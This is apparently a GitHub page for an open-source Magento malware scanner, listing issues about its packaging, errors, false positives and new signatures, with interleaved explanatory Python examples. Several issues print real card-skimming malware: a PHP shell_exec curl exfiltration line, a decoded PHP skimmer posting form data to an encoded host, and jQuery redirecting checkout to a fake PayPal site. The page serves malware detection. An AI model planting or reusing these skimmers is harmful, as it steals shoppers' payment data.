Scanner, signatures and the largest collection of Magento malware

Overview

Improved malware scanner now available

Good news: our open-source malware scanner "mwscan" has been succeeded by a much better one called eComscan. It is developed by Sansec, experts in Magento store security.

Update 2021: Sansec is now recognized as an Adobe partner and runs on more than 7000 stores worldwide.

Use one month free of charge

eComscan offers many improvements over mwscan:

  • 22 thousand malware signatures and counting
  • Detects vulnerabilities in Magento and third party ecommerce components
  • Monitoring of files & databases
  • Get instant, actionable alerts via mail, Slack, phone & webhook

The Sansec threat intel team investigates hundreds of hacked stores per month, and adds new attack signatures multiple times per day. We believe it is by far the best solution to protect your Magento store from emerging threats.

You can use our full solution one month free of charge. Get your copy here and use coupon code MWSCAN. Your store and your customers will benefit!

Sample command line scan

Sample CLI scan output

Sample report

Sample GUI scan output

Who uses it?

Mwscan and its successor eComscan are recommended by Magento and used by the US Department of Homeland Security, the Magento Marketplace, Magereport, the Mage Security Council and many others.

About payment skimming and Magecart

Online payment skimming (aka "MageCart") is a growing threat to digital stores. Since our first publication in 2015, we have identified more than 40.000 compromised stores. In most cases, malware is inserted that will a) intercept customer data, b) divert payments or c) use your customers for cryptojacking.

Privacy watchdogs and online regulators are increasingly handing out fines to companies that have suffered a Magecart attack.

Comments
  • Move build artefacts out of repo

    Note to mwscan users: update your install, or you will not get new rules anymore!

    • The grep URL has changed from git.io/mwscan.txt to mwscan.s3.amazonaws.com/mwscan.txt
    • If using the mwscan package, try sudo pip3 install --upgrade mwscan (or sudo pip install --upgrade mwscan).

    See the updated docs for sample crons.

    What is this change about?

    Let the CI pipeline build the signatures, instead of including them in the repo (redundantly).

    Pro: This will unclutter many PRs.
    Con: Installation instructions need to change; people need to update their mwscan code, as the URL is hardcoded and currently points to github.

    Plan:

    • [x] Instruct Travis to build rules and upload them to S3 upon commit to master. Done: https://mwscan.s3.amazonaws.com/mwscan.yar
    • [x] Change built rules name to mwscan.txt and mwscan.yar (from all-confirmed).
    • [x] Update all references to all-confirmed, eg in travis test scripts
    • [x] Change URL in ruleset.py
    • [x] Update basic instructions/URL for grep usage
    • [x] Do not bundle rules anymore in pip/deb package and remove DEFAULT_RULES_FILE
    • [x] Make mwscan ruleset the default one
    • [x] Ensure that scanning continues, even if S3 is unreachable (except of course when there is no cached version of the rules)
    • [x] Add build/* to .gitignore so PRs will not clutter any further.
    • [x] Verify that mwscan without arguments still does a sane thing (ie download the latest default ruleset and use that)
    • [x] Update screenshot in docs
    • [x] Release new pip package
    • [x] Add wildcard rule that will fail on everything, to warn sysadmins to upgrade.

    Mwscan users (e.g. Byte) should:

    • [x] Once steps above are completed, install new pip package and/or build new deb with new S3 rule URL
    opened by gwillem 18
  • Contributing without coding

    With Magereport and some additional tools I found viruses on my Magento store. I found some in footers via configuration and some in catalog search, CMS blocks and visitor info, by doing a search for eval in any DB field in the Magento database...

    Would those viruses be of interest?

    opened by ddoddsr 12
  • Encoded JS functions - CC Hijack

    JavaScript found in cms_block - the code features encoding functions. The Yara rules should identify the decode function of the script and/or parameters being passed to the decode function for execution.

    opened by Mooey28 7
  • Should Adminer be flagged as malware?

    Technically, Adminer is not malware of course. However, it appears that Adminer is a commonly used tool by Magento exploiters to ensure future database access. General attack flow:

    1. Hacker gets in through SQL injection, Shoplift, Magmi, Webforms upload, brute forcing weak admin password.
    2. Hacker fetches database password from local.xml
    3. Hacker drops backdoors to ensure future access. Backdoors are webshells, blanket eval or upload forms, or database webinterfaces (Adminer).

    On our platform, we found roughly 100 Adminer installs. A sample validation revealed that most of them were not put there by the site owner.

    What to do?

    question 
    opened by gwillem 7
  • Py2 doesn't handle the magesec rules

    [*] https://magesec.org:443 "GET /download/yara-standard.yar HTTP/1.1" 200 159703
    Traceback (most recent call last):
      File "/usr/local/bin/mwscan", line 9, in <module>
        load_entry_point('mwscan==20180307.122431', 'console_scripts', 'mwscan')()
      File "/usr/local/lib/python2.7/dist-packages/mwscan/scan.py", line 243, in main
        rules, whitelist = provider(args=args).get()
      File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 124, in get
        rawrules = self.get_rules()
      File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 46, in get_rules
        return self._recursive_fetch(self.rules_url)
      File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 145, in _recursive_fetch
        data = self._httpget(url)
      File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 109, in _httpget
        return resp.content.decode()
    UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position 154508: ordinal not in range(128)
    
    bug 
    opened by gwillem 5
  • MWSCAN and Python Version

    Setting up MWSCAN on our managed server, which is running Python 2.7. Can MWSCAN run on 2.7? I get the message:

    Traceback (most recent call last):
      File "./mwscan", line 38, in <module>
        from ruleset import providers
    ImportError: No module named ruleset

    opened by ddoddsr 5
  • MageReport found Credit Card Hijack , malware-scanner did not

    MageReport found Credit Card Hijack, malware-scanner did not. Then I downloaded and scanned the DB and site backup files with a different scanner (Kaspersky) and did not find it either.

    What's next?

    opened by ddoddsr 5
  • TypeError: decode() takes no keyword arguments

    I've been having ongoing problems with mwscanner since the AWS update. I have a CentOS6 server.

    Initially I was getting the "pkg_resources.DistributionNotFound: requests>=0.8.2" and I couldn't get past that until I finally found the comment in usage.md that says to run "easy_install --upgrade requests".

    That finally resolved the error that's been holding me up, but the scan didn't get far before reporting a different error.

    [*] Using Mwscan rules.
    [*] Fetching mwscan.yar
    [*] Starting new HTTPS connection (1): mwscan.s3.amazonaws.com
    [*] https://mwscan.s3.amazonaws.com:443 "GET /mwscan.yar HTTP/1.1" 200 155458
    Traceback (most recent call last):
      File "/usr/bin/mwscan", line 9, in <module>
        load_entry_point('mwscan==20180510.172121', 'console_scripts', 'mwscan')()
      File "/usr/lib/python2.6/site-packages/mwscan/scan.py", line 243, in main
        rules, whitelist = provider(args=args).get()
      File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 139, in get
        rawrules = self.get_rules()
      File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 48, in get_rules
        rawrules = self._recursive_fetch(self.rules_url)
      File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 160, in _recursive_fetch
        data = self._httpget(url)
      File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 121, in _httpget
        return resp.content.decode('utf-8', errors='ignore')
    TypeError: decode() takes no keyword arguments
    
    opened by 01i 4
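The two tracebacks reported above (the UnicodeDecodeError on byte 0xc2 under Python 2, and "decode() takes no keyword arguments" under Python 2.6) have one root cause: on Python 2, str.decode() defaults to the ASCII codec, and on 2.6 it accepts only positional arguments. The following is an added example, not mwscan's own code, of a decode helper that behaves the same on Python 2.6, 2.7 and 3; the names decode_body and rule_names and the sample ruleset bytes are constructed for this illustration.

```python
# Added example, not part of mwscan: decode an HTTP response body that may
# contain non-ASCII bytes so that it works on Python 2.6, 2.7 and 3.
#
# Python 2's str.decode() defaults to the ASCII codec (hence the
# UnicodeDecodeError on byte 0xc2), and on Python 2.6 it rejects keyword
# arguments (hence "decode() takes no keyword arguments"). Passing the codec
# and the error handler positionally avoids both failures.


def decode_body(raw, encoding='utf-8', errors='replace'):
    """Return raw as text; undecodable bytes are replaced instead of raising."""
    if not isinstance(raw, bytes):
        return raw                      # already text (requests may do this)
    # Positional arguments on purpose: Python 2.6 str.decode has no kwargs.
    return raw.decode(encoding, errors)


def rule_names(ruleset_text):
    """Collect YARA rule names from decoded ruleset text (simple line scan)."""
    names = []
    for line in ruleset_text.splitlines():
        parts = line.strip().split()
        if len(parts) >= 2 and parts[0] == 'rule':
            names.append(parts[1].rstrip('{'))
    return names


# Constructed sample resembling a downloaded ruleset: a UTF-8 non-breaking
# space (0xc2 0xa0) inside a string, plus one stray byte that is not valid UTF-8.
SAMPLE_RULESET = (
    b'rule skimmer_keywords {\n'
    b'  strings: $a = "cc_number\xc2\xa0cvv"\n'
    b'  condition: $a\n}\n'
    b'rule stray_byte { strings: $b = "\xff" condition: $b }\n'
)

if __name__ == '__main__':
    text = decode_body(SAMPLE_RULESET)
    print(rule_names(text))             # ['skimmer_keywords', 'stray_byte']
```

With 'replace' the stray byte becomes U+FFFD and every rule survives; with 'ignore' (as in the second traceback's fix) it is silently dropped, which is also fine for a ruleset download but hides the fact that the file was not clean UTF-8.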
  • Make debian packaging work out of the box

    If dh-python is not added as a build dependency, the Depends field will be filled with weird and incorrect values from setup.py's install_requires.

    However, dh-python causes ${python:Depends} to be too strict. So just get rid of that and put in the python version Depends manually.

    I tested this using cowbuilder/pdebuild for Debian Stretch as well as Ubuntu Xenial.

    Also see comments in https://github.com/gwillem/magento-malware-scanner/pull/185

    opened by andreas-bytenl 4
  • False positives in rule dynamic_base64_function_call_us_04557

    Rule 'dynamic_base64_function_call_us_04557' causes a lot of false positives in several extensions.

    Example 1: app/code/local/TBT/Bss/Helper/Loyalty/Checker.php

    <?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%
    

    Example 2: app/code/local/Mindstretch/Betterinvoice/Model/Order/Pdf/Items/Invoice/Default.php

    <?php /* Copyright Mindstretch */$OOO000000=urldecode('%66%67%36
    
    opened by Rolandwalraven 4
  • Fix false alerts

    This reverts commit 3630d9c8ca15524d71aa27d9eeb1ac7a5a972c12.

    This whitespace was causing grep to return lots of false errors.

    Download vanilla magento and prepare for quick scan

    [15:31:30] lukerodgers [~/src]$ git clone --depth 1 [email protected]:openmage/magento-mirror m1.9
    Cloning into 'm1.9'...
    remote: Counting objects: 19333, done.
    remote: Compressing objects: 100% (9357/9357), done.
    remote: Total 19333 (delta 8736), reused 14750 (delta 7613), pack-reused 0
    Receiving objects: 100% (19333/19333), 25.54 MiB | 2.97 MiB/s, done.
    Resolving deltas: 100% (8736/8736), done.
    Checking out files: 100% (14411/14411), done.
    [15:31:54] lukerodgers [~/src]$ cd m1.9/
    [15:31:56] lukerodgers [~/src/m1.9]$ wget git.io/mwscan.txt
    URL transformed to HTTPS due to an HSTS policy
    --2017-10-23 15:32:06--  https://git.io/mwscan.txt
    Resolving git.io... 54.243.73.226, 54.243.115.172, 54.225.199.17, ...
    Connecting to git.io|54.243.73.226|:443... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.txt [following]
    --2017-10-23 15:32:07--  https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.txt
    Resolving raw.githubusercontent.com... 151.101.128.133, 151.101.192.133, 151.101.64.133, ...
    Connecting to raw.githubusercontent.com|151.101.128.133|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 56339 (55K) [text/plain]
    Saving to: 'mwscan.txt'
    
    mwscan.txt                        100%[============================================================>]  55.02K  --.-KB/s   in 0.02s
    
    2017-10-23 15:32:08 (2.82 MB/s) - 'mwscan.txt' saved [56339/56339]
    

    Run quick scan and see lots of stuff

    None of the above should be appearing

    [15:32:16] lukerodgers [~/src/m1.9]$ grep -Erlf mwscan.txt ./
    .//.gitignore
    .//.htaccess
    .//.htaccess.sample
    .//api.php
    .//app/.htaccess
    .//app/bootstrap.php
    .//app/code/community/Cm/RedisSession/etc/config.xml
    .//app/code/community/Cm/RedisSession/Model/Session.php
    .//app/code/community/Phoenix/Moneybookers/Block/Form.php
    .//app/code/community/Phoenix/Moneybookers/Block/Info.php
    .//app/code/community/Phoenix/Moneybookers/Block/Jsinit.php
    .//app/code/community/Phoenix/Moneybookers/Block/Payment.php
    .//app/code/community/Phoenix/Moneybookers/Block/Placeform.php
    .//app/code/community/Phoenix/Moneybookers/Block/Redirect.php
    .//app/code/community/Phoenix/Moneybookers/controllers/MoneybookersController.php
    .//app/code/community/Phoenix/Moneybookers/controllers/ProcessingController.php
    .//app/code/community/Phoenix/Moneybookers/etc/config.xml
    .//app/code/community/Phoenix/Moneybookers/etc/system.xml
    .//app/code/community/Phoenix/Moneybookers/Helper/Data.php
    .//app/code/community/Phoenix/Moneybookers/Model/Abstract.php
    .//app/code/community/Phoenix/Moneybookers/Model/Acc.php
    .//app/code/community/Phoenix/Moneybookers/Model/Csi.php
    .//app/code/community/Phoenix/Moneybookers/Model/Did.php
    .......
    [truncated, it goes on!]
    

    Manually patch mwscan.txt

    [15:33:38] lukerodgers [~/src/m1.9]$ cp mwscan.txt mwscan.txt.orig
    [15:33:42] lukerodgers [~/src/m1.9]$ nano mwscan.txt # remove final whitespace line
    [15:33:53] lukerodgers [~/src/m1.9]$ grep -Erlf mwscan.txt ./ # this command ran for a minute with no output
    ^C
    [15:34:10] lukerodgers [~/src/m1.9]$ diff mwscan.txt mwscan.txt.orig
    846a847
    >
    
    opened by convenient 4
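The diff at the end of the session above ("846a847 >") shows the cause: a blank line in the pattern file. For grep -f, an empty pattern matches every line, so every file in a vanilla Magento checkout gets reported. Python's regex module behaves the same way, and the added example below (not the project's code) shows a loader that rejects blank or invalid patterns before scanning, next to a loader that mimics grep's behaviour, run over constructed sample files. The names load_patterns, compile_like_grep, scan_files, the sample rules and the sample files are assumptions for this illustration.

```python
# Added example (not mwscan's code): guard a grep-style pattern file against
# blank lines. An empty regex matches every line, so one stray blank line in
# mwscan.txt makes "grep -Erlf mwscan.txt ./" report every file in the store.
import re


def compile_like_grep(pattern_text):
    """What grep -f does: every line, even an empty one, becomes a pattern."""
    return [re.compile(line) for line in pattern_text.splitlines()]


def load_patterns(pattern_text):
    """Compile one regex per line; return (patterns, problems).

    Blank lines are dropped and reported rather than compiled, because
    re.compile('') (like an empty grep -f pattern) matches everything.
    """
    patterns, problems = [], []
    for lineno, line in enumerate(pattern_text.splitlines(), 1):
        if not line.strip():
            problems.append('line %d: empty pattern, would match every line' % lineno)
            continue
        try:
            patterns.append(re.compile(line))
        except re.error as exc:
            problems.append('line %d: invalid regex %r (%s)' % (lineno, line, exc))
    return patterns, problems


def scan_files(files, patterns):
    """Return names of files in which any pattern matches a line (grep -Erl)."""
    hits = []
    for name, content in sorted(files.items()):
        if any(p.search(line) for line in content.splitlines() for p in patterns):
            hits.append(name)
    return hits


# Constructed pattern file: two plausible rules, then the stray blank line
# that the diff above revealed at the end of the real file.
RULES_OK = r"eval\(base64_decode\(" + "\n" + r"shell_exec\(.curl " + "\n"
RULES_BROKEN = RULES_OK + "\n"

# Constructed store files: one clean core file, one backdoored upload.
FILES = {
    'app/Mage.php': "<?php\nfinal class Mage { public static function app() {} }\n",
    'media/wysiwyg/x.php': "<?php eval(base64_decode('ZWNobyAxOw=='));\n",
}

if __name__ == '__main__':
    print(scan_files(FILES, compile_like_grep(RULES_BROKEN)))  # every file
    patterns, problems = load_patterns(RULES_BROKEN)
    print(problems)                                             # warns about line 3
    print(scan_files(FILES, patterns))                          # only x.php
```

If the grep workflow is kept, the same guard is one filter before the scan, e.g. grep -v '^$' mwscan.txt > mwscan.clean.txt, and the validation step is worth running whenever a freshly downloaded ruleset suddenly flags far more files than the previous one did.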
  • python-setuptools should be included in the docs

    The documentation for usage notes that python-pip, gcc and python-dev are required for install, however you also need python-setuptools on Debian Stretch for the "pip install" to succeed

    opened by nicka101 0
  • Add this snippet

    From app/code/core/Mage/Core/functions.php

    if (preg_match("/".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ8bW9udGh8ZHVtbXl8c2VjdXJldHJhZGluZ3x5ZWFyfGxvZ2lufGJpbGxpbmd8ZXhwaXJ5fHBheW1lbnR8Y2FyZF9udW1iZXI=')."/i", serialize($_POST)))
    -    @shell_exec("curl --data \"version=1&encode=".base64_encode(    serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".trim(base64_decode('aHR0cDovL3ZlcnBheW1lbnQuY29tL3Rlc3RTZXJ2ZXIucGhw'))." > /dev/null 2<&1 &");
    
    opened by gwillem 0
  • Malware not detected in Cc.php and Mage_Payment_Model_Method_Cc.php

    I found this line manually after a deep mwscan:

        <?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__); eval(base64_decode("ENCRYPT...

    When I decrypt Zeura I get the following code at the end of the file:

        if(isset($_POST)){$EvxCq = WmJQW('',$_POST,0); $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));} function WmJQW($bRrNN,$CYRnG,$qabbF) {foreach($CYRnG as $vikBC => $PmGhs) {if(!is_array($PmGhs)) { if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}else {$dwTSf[] = $vikBC.'='.$PmGhs;} }else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}}return implode('&',$dwTSf);} ?>

    opened by ernesthernandez 1
  • pip vs yum python

    You need to check if Python packages are already installed and managed with yum or apt, instead of re-installing them with pip. This will break other Python projects.

    opened by magenx 4
  • Malware that changes payment method URL to hacker's PayPal account

    It was adding the following code to some of the JS files; in our case it was quickview.js and ccard.js:

    
    jQuery(document).ready(function()
    {
    	if(!(document.cookie.indexOf("userpayid") + 1))
    	{
    		jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();");
    		jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();");
    		jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");
    		jQuery("#checkout-onepage-buttom").attr("onclick", "paynow_right();");
    		jQuery("#onestepcheckout-button-place-order").attr("onclick", "paynow_right();");
    		jQuery("#onestepcheckout-place-order").attr("onclick", "paynow_right();");
    	}
    });
    
    function paynow_right()
    {
    	if(!(document.cookie.indexOf("userpayid") + 1))
    	{
    		var rand = function()
    		{
    			return Math.random().toString(36).substr(2);
    		};
    		document.cookie = "userpayid=" + rand();
    		var arr = {
    			"location" : "http://" + location.host,
    			"method" : "PayPal"
    		};
    		jQuery(location).attr('href', "//paymentpal.cf/?payment=" + btoa(JSON.stringify(arr)));
    	}
    }
    
    

    • quickview.js => https://pastebin.com/xUgXxwDe
    • ccard.js => https://pastebin.com/tkGgKQSi

    We also see 2 files with strange names:

    • 2.php.png => https://pastebin.com/RC4v6UrX
    • slltemap.php.jpg => https://pastebin.com/0q3naCgZ
    opened by jigneshthummar 2
Owner
Willem de Groot